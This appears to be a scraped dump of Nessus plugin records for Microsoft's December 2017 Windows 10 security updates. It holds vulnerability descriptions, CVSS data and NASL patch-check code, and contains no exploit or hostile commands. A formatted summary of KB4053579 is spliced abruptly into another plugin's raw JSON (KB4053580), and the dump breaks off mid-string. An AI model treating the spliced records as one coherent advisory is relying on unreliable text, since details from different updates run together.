The remote Windows host is missing security update 4053579.
It is, therefore, affected by multiple vulnerabilities:
- A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918)
- A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non-malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files. (CVE-2017-11899)
- An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11919)
- A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888)
- A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)
- A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885)
- A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)
- An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11887, CVE-2017-11906)
- An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927)
Title: KB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update
Plugin: Nessus 105180 (SMB_NT_MS17_DEC_4053579.NASL), family "Windows : Microsoft Bulletins", script version 1.10
Published: 2017-12-12; modified: 2020-08-18
Severity: High (Nessus); VPR 8.9
CVSS v2: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
CVSS v3: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Vendor CVSS v3: 6.6 (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H); CVSS score source: CVE-2017-11885
Exploit availability: Exploits are available
CPE: cpe:/o:microsoft:windows, cpe:/a:microsoft:edge
Check: local plugin; checks for the 12_2017 rollup on Windows 10 build 14393; requires ports 139, 445 or patch management checks
Solution: Apply security update KB4053579.
See also: https://www.tenable.com/plugins/nessus/105180, http://www.nessus.org/u?d6fee547, https://support.microsoft.com/en-us/help/4053579/windows-10-update-kb4053579
Reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
(CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. 
This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4053580/windows-10-update-kb4053580\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7a4dd124\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4053580.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4053580');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4053580])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:43:00", "description": "The remote Windows host is missing security update 4053578.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non-malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. 
This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "KB4053578: Windows 10 Version 1511 December 2017 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2020-08-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_DEC_4053578.NASL", "href": "https://www.tenable.com/plugins/nessus/105179", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from 
the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105179);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11888\",\n \"CVE-2017-11889\",\n \"CVE-2017-11890\",\n \"CVE-2017-11893\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11899\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11905\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11909\",\n \"CVE-2017-11910\",\n \"CVE-2017-11911\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11914\",\n \"CVE-2017-11918\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102050,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102065,\n 102077,\n 102078,\n 102080,\n 102081,\n 102082,\n 102085,\n 102086,\n 102087,\n 102088,\n 102089,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4053578\");\n script_xref(name:\"MSFT\", value:\"MS17-4053578\");\n\n script_name(english:\"KB4053578: Windows 10 Version 1511 December 2017 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4053578.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11889,\n CVE-2017-11893, CVE-2017-11905, CVE-2017-11909,\n CVE-2017-11910, CVE-2017-11911, CVE-2017-11914,\n CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. 
This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4053578/windows-10-update-kb4053578\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00abfab6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4053578.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4053578');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4053578])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:40:56", "description": "The remote Windows host is missing security update 4054517.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non-malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. 
This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "KB4054517: Windows 10 Version 1709 and Windows Server Version 1709 December 2017 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2020-08-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_DEC_4054517.NASL", "href": "https://www.tenable.com/plugins/nessus/105183", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and 
package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105183);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11888\",\n \"CVE-2017-11889\",\n \"CVE-2017-11890\",\n \"CVE-2017-11893\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11899\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11905\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11908\",\n \"CVE-2017-11909\",\n \"CVE-2017-11910\",\n \"CVE-2017-11911\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11914\",\n \"CVE-2017-11918\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102050,\n 102052,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102065,\n 102077,\n 102078,\n 102080,\n 102081,\n 102082,\n 102085,\n 102086,\n 102087,\n 102088,\n 102089,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4054517\");\n script_xref(name:\"MSFT\", value:\"MS17-4054517\");\n\n script_name(english:\"KB4054517: Windows 10 Version 1709 and Windows Server Version 1709 December 2017 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4054517.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. 
The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11889,\n CVE-2017-11893, CVE-2017-11905, CVE-2017-11908,\n CVE-2017-11909, CVE-2017-11910, CVE-2017-11911,\n CVE-2017-11914, CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. 
